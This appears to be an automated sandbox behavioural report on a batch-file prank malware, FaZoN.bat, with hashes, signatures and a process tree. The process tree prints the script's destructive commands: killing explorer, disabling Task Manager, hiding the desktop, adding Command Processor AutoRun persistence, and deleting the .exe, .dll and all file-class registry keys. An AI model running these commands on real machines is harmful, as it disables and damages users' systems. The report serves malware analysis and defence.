Overview
overview
10Static
static
10@_136 @828...SM.exe
windows7-x64
7@_136 @828...SM.exe
windows10-2004-x64
7TrashMalwa...in.exe
windows7-x64
8TrashMalwa...in.exe
windows10-2004-x64
8AdStRkJ.exe
windows7-x64
8AdStRkJ.exe
windows10-2004-x64
8Anatralier.exe
windows7-x64
7Anatralier.exe
windows10-2004-x64
7TrashMalwa...er.exe
windows7-x64
3TrashMalwa...er.exe
windows10-2004-x64
8TrashMalwa...nk.exe
windows7-x64
8TrashMalwa...nk.exe
windows10-2004-x64
8TrashMalwa...oN.bat
windows7-x64
8TrashMalwa...oN.bat
windows10-2004-x64
8TrashMalwa...zz.exe
windows7-x64
6TrashMalwa...zz.exe
windows10-2004-x64
6TrashMalwa...de.exe
windows7-x64
7TrashMalwa...de.exe
windows10-2004-x64
7TrashMalwa...20.exe
windows7-x64
4TrashMalwa...20.exe
windows10-2004-x64
7TrashMalwa...ll.exe
windows7-x64
7TrashMalwa...ll.exe
windows10-2004-x64
7TrashMalwa...le.exe
windows7-x64
8TrashMalwa...le.exe
windows10-2004-x64
8TrashMalwa...oe.bat
windows7-x64
8TrashMalwa...oe.bat
windows10-2004-x64
8TrashMalwa....0.exe
windows7-x64
6TrashMalwa....0.exe
windows10-2004-x64
7TrashMalwa....0.exe
windows7-x64
8TrashMalwa....0.exe
windows10-2004-x64
7TrashMalwa....0.exe
windows7-x64
7TrashMalwa....0.exe
windows10-2004-x64
7Analysis
-
max time kernel
132s -
max time network
60s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
02-03-2024 20:26
Behavioral task
behavioral1
Sample
@_136 @828#-138389J-SJFJDSM.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
@_136 @828#-138389J-SJFJDSM.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
TrashMalwares-main/AcidRain.exe
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
TrashMalwares-main/AcidRain.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral5
Sample
AdStRkJ.exe
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
AdStRkJ.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral7
Sample
Anatralier.exe
Resource
win7-20240215-en
Behavioral task
behavioral8
Sample
Anatralier.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral9
Sample
TrashMalwares-main/Antivirus_Installer.exe
Resource
win7-20240221-en
Behavioral task
behavioral10
Sample
TrashMalwares-main/Antivirus_Installer.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral11
Sample
TrashMalwares-main/Dro trojan. Virus prank.exe
Resource
win7-20240221-en
Behavioral task
behavioral12
Sample
TrashMalwares-main/Dro trojan. Virus prank.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral13
Sample
TrashMalwares-main/FaZoN.bat
Resource
win7-20240221-en
Behavioral task
behavioral14
Sample
TrashMalwares-main/FaZoN.bat
Resource
win10v2004-20240226-en
Behavioral task
behavioral15
Sample
TrashMalwares-main/Fizz.exe
Resource
win7-20240221-en
Behavioral task
behavioral16
Sample
TrashMalwares-main/Fizz.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral17
Sample
TrashMalwares-main/Ginxide.exe
Resource
win7-20240221-en
Behavioral task
behavioral18
Sample
TrashMalwares-main/Ginxide.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral19
Sample
TrashMalwares-main/Install Windows20.exe
Resource
win7-20240221-en
Behavioral task
behavioral20
Sample
TrashMalwares-main/Install Windows20.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral21
Sample
TrashMalwares-main/MS-RickRoll.exe
Resource
win7-20240220-en
Behavioral task
behavioral22
Sample
TrashMalwares-main/MS-RickRoll.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral23
Sample
TrashMalwares-main/MercuryXhoffle.exe
Resource
win7-20240221-en
Behavioral task
behavioral24
Sample
TrashMalwares-main/MercuryXhoffle.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral25
Sample
TrashMalwares-main/NetPakoe.bat
Resource
win7-20240221-en
Behavioral task
behavioral26
Sample
TrashMalwares-main/NetPakoe.bat
Resource
win10v2004-20240226-en
Behavioral task
behavioral27
Sample
TrashMalwares-main/NetPakoe3.0.exe
Resource
win7-20240221-en
Behavioral task
behavioral28
Sample
TrashMalwares-main/NetPakoe3.0.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral29
Sample
TrashMalwares-main/NoEscape8.0.exe
Resource
win7-20240221-en
Behavioral task
behavioral30
Sample
TrashMalwares-main/NoEscape8.0.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral31
Sample
TrashMalwares-main/PC shaking v4.0.exe
Resource
win7-20240220-en
Behavioral task
behavioral32
Sample
TrashMalwares-main/PC shaking v4.0.exe
Resource
win10v2004-20240226-en
General
-
Target
TrashMalwares-main/FaZoN.bat
-
Size
1KB
-
MD5
2a2c2cca38f2e34ee666d4534834dcbb
-
SHA1
8ffa496f4e56c6406f8f965059483125966c6fdd
-
SHA256
6397c16efa9b0ff4732002d37a948192b1df49c0c2c927806622fa59d3ac1b46
-
SHA512
e05a896d8bcad42c04b69c14be3b625d1f586049b2a5925d08bae47f47429b44669904e22daaf94c003bbd697957bddf6067e1aaccc9dd4cb7c607a1d78686d0
Malware Config
Signatures
-
Disables Task Manager via registry modification
-
Modifies Installed Components in the registry 2 TTPs 1 IoCs
Processes:
explorer.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Deletes itself 1 IoCs
Processes:
cmd.exepid process 2068 cmd.exe -
Drops file in System32 directory 2 IoCs
Processes:
cmd.exedescription ioc process File opened for modification C:\Windows\system32\gosha.bat cmd.exe File created C:\Windows\system32\gosha.bat cmd.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 2648 taskkill.exe -
Modifies registry class 7 IoCs
Processes:
explorer.execmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.exe cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.exe\ = ".txt" cmd.exe -
Modifies registry key 1 TTPs 4 IoCs
Processes:
reg.exereg.exereg.exereg.exepid process 2908 reg.exe 2668 reg.exe 2708 reg.exe 2572 reg.exe -
Suspicious use of AdjustPrivilegeToken 19 IoCs
Processes:
taskkill.exeexplorer.execmd.exedescription pid process Token: SeDebugPrivilege 2648 taskkill.exe Token: SeShutdownPrivilege 2444 explorer.exe Token: SeSystemtimePrivilege 2068 cmd.exe Token: SeSystemtimePrivilege 2068 cmd.exe Token: SeShutdownPrivilege 2444 explorer.exe Token: SeShutdownPrivilege 2444 explorer.exe Token: SeShutdownPrivilege 2444 explorer.exe Token: SeShutdownPrivilege 2444 explorer.exe Token: SeShutdownPrivilege 2444 explorer.exe Token: SeShutdownPrivilege 2444 explorer.exe Token: SeShutdownPrivilege 2444 explorer.exe Token: SeShutdownPrivilege 2444 explorer.exe Token: SeShutdownPrivilege 2444 explorer.exe Token: SeShutdownPrivilege 2444 explorer.exe Token: SeShutdownPrivilege 2444 explorer.exe Token: SeShutdownPrivilege 2444 explorer.exe Token: SeShutdownPrivilege 2444 explorer.exe Token: SeShutdownPrivilege 2444 explorer.exe Token: SeShutdownPrivilege 2444 explorer.exe -
Suspicious use of FindShellTrayWindow 29 IoCs
Processes:
explorer.exepid process 2444 explorer.exe 2444 explorer.exe 2444 explorer.exe 2444 explorer.exe 2444 explorer.exe 2444 explorer.exe 2444 explorer.exe 2444 explorer.exe 2444 explorer.exe 2444 explorer.exe 2444 explorer.exe 2444 explorer.exe 2444 explorer.exe 2444 explorer.exe 2444 explorer.exe 2444 explorer.exe 2444 explorer.exe 2444 explorer.exe 2444 explorer.exe 2444 explorer.exe 2444 explorer.exe 2444 explorer.exe 2444 explorer.exe 2444 explorer.exe 2444 explorer.exe 2444 explorer.exe 2444 explorer.exe 2444 explorer.exe 2444 explorer.exe -
Suspicious use of SendNotifyMessage 17 IoCs
Processes:
explorer.exepid process 2444 explorer.exe 2444 explorer.exe 2444 explorer.exe 2444 explorer.exe 2444 explorer.exe 2444 explorer.exe 2444 explorer.exe 2444 explorer.exe 2444 explorer.exe 2444 explorer.exe 2444 explorer.exe 2444 explorer.exe 2444 explorer.exe 2444 explorer.exe 2444 explorer.exe 2444 explorer.exe 2444 explorer.exe -
Suspicious use of WriteProcessMemory 54 IoCs
Processes:
cmd.exedescription pid process target process PID 2068 wrote to memory of 2612 2068 cmd.exe msg.exe PID 2068 wrote to memory of 2612 2068 cmd.exe msg.exe PID 2068 wrote to memory of 2612 2068 cmd.exe msg.exe PID 2068 wrote to memory of 2648 2068 cmd.exe taskkill.exe PID 2068 wrote to memory of 2648 2068 cmd.exe taskkill.exe PID 2068 wrote to memory of 2648 2068 cmd.exe taskkill.exe PID 2068 wrote to memory of 2708 2068 cmd.exe reg.exe PID 2068 wrote to memory of 2708 2068 cmd.exe reg.exe PID 2068 wrote to memory of 2708 2068 cmd.exe reg.exe PID 2068 wrote to memory of 2572 2068 cmd.exe reg.exe PID 2068 wrote to memory of 2572 2068 cmd.exe reg.exe PID 2068 wrote to memory of 2572 2068 cmd.exe reg.exe PID 2068 wrote to memory of 2908 2068 cmd.exe reg.exe PID 2068 wrote to memory of 2908 2068 cmd.exe reg.exe PID 2068 wrote to memory of 2908 2068 cmd.exe reg.exe PID 2068 wrote to memory of 2444 2068 cmd.exe explorer.exe PID 2068 wrote to memory of 2444 2068 cmd.exe explorer.exe PID 2068 wrote to memory of 2444 2068 cmd.exe explorer.exe PID 2068 wrote to memory of 2876 2068 cmd.exe msg.exe PID 2068 wrote to memory of 2876 2068 cmd.exe msg.exe PID 2068 wrote to memory of 2876 2068 cmd.exe msg.exe PID 2068 wrote to memory of 2668 2068 cmd.exe reg.exe PID 2068 wrote to memory of 2668 2068 cmd.exe reg.exe PID 2068 wrote to memory of 2668 2068 cmd.exe reg.exe PID 2068 wrote to memory of 2584 2068 cmd.exe msg.exe PID 2068 wrote to memory of 2584 2068 cmd.exe msg.exe PID 2068 wrote to memory of 2584 2068 cmd.exe msg.exe PID 2068 wrote to memory of 2464 2068 cmd.exe reg.exe PID 2068 wrote to memory of 2464 2068 cmd.exe reg.exe PID 2068 wrote to memory of 2464 2068 cmd.exe reg.exe PID 2068 wrote to memory of 2412 2068 cmd.exe msg.exe PID 2068 wrote to memory of 2412 2068 cmd.exe msg.exe PID 2068 wrote to memory of 2412 2068 cmd.exe msg.exe PID 2068 wrote to memory of 2452 2068 cmd.exe msg.exe PID 2068 wrote to memory of 2452 2068 cmd.exe msg.exe PID 2068 wrote to memory of 2452 2068 cmd.exe msg.exe PID 2068 wrote to memory of 1844 2068 cmd.exe msg.exe PID 2068 wrote to memory of 1844 2068 cmd.exe msg.exe PID 2068 wrote to memory of 1844 2068 cmd.exe msg.exe PID 2068 wrote to memory of 3032 2068 cmd.exe cmd.exe PID 2068 wrote to memory of 3032 2068 cmd.exe cmd.exe PID 2068 wrote to memory of 3032 2068 cmd.exe cmd.exe PID 2068 wrote to memory of 2460 2068 cmd.exe reg.exe PID 2068 wrote to memory of 2460 2068 cmd.exe reg.exe PID 2068 wrote to memory of 2460 2068 cmd.exe reg.exe PID 2068 wrote to memory of 2036 2068 cmd.exe reg.exe PID 2068 wrote to memory of 2036 2068 cmd.exe reg.exe PID 2068 wrote to memory of 2036 2068 cmd.exe reg.exe PID 2068 wrote to memory of 2148 2068 cmd.exe reg.exe PID 2068 wrote to memory of 2148 2068 cmd.exe reg.exe PID 2068 wrote to memory of 2148 2068 cmd.exe reg.exe PID 2068 wrote to memory of 2388 2068 cmd.exe cmd.exe PID 2068 wrote to memory of 2388 2068 cmd.exe cmd.exe PID 2068 wrote to memory of 2388 2068 cmd.exe cmd.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\FaZoN.bat"1⤵
- Deletes itself
- Drops file in System32 directory
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2068 -
C:\Windows\system32\msg.exemsg * Gosha created by GGmex your computer infected2⤵PID:2612
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im explorer.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2648
-
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d C:\Windows\explorer.exe /f2⤵
- Modifies registry key
PID:2708
-
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Polices\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
PID:2572
-
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
PID:2908
-
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Modifies Installed Components in the registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2444
-
-
C:\Windows\system32\msg.exemsg * Your desktop has been crashed2⤵PID:2876
-
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
PID:2668
-
-
C:\Windows\system32\msg.exemsg * Your windows infected by gosha :)2⤵PID:2584
-
-
C:\Windows\system32\reg.exereg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\syste m32\gosha.bat" /f2⤵PID:2464
-
-
C:\Windows\system32\msg.exemsg * Deleted files2⤵PID:2412
-
-
C:\Windows\system32\msg.exemsg * Your system has been removed...2⤵PID:2452
-
-
C:\Windows\system32\msg.exemsg * Click OK2⤵PID:1844
-
-
C:\Windows\system32\cmd.execmd2⤵PID:3032
-
-
C:\Windows\system32\reg.exereg delete HKCR/.exe2⤵PID:2460
-
-
C:\Windows\system32\reg.exereg delete HKCR/.dll2⤵PID:2036
-
-
C:\Windows\system32\reg.exereg delete HKCR/*2⤵PID:2148
-
-
C:\Windows\system32\cmd.execmd2⤵PID:2388
-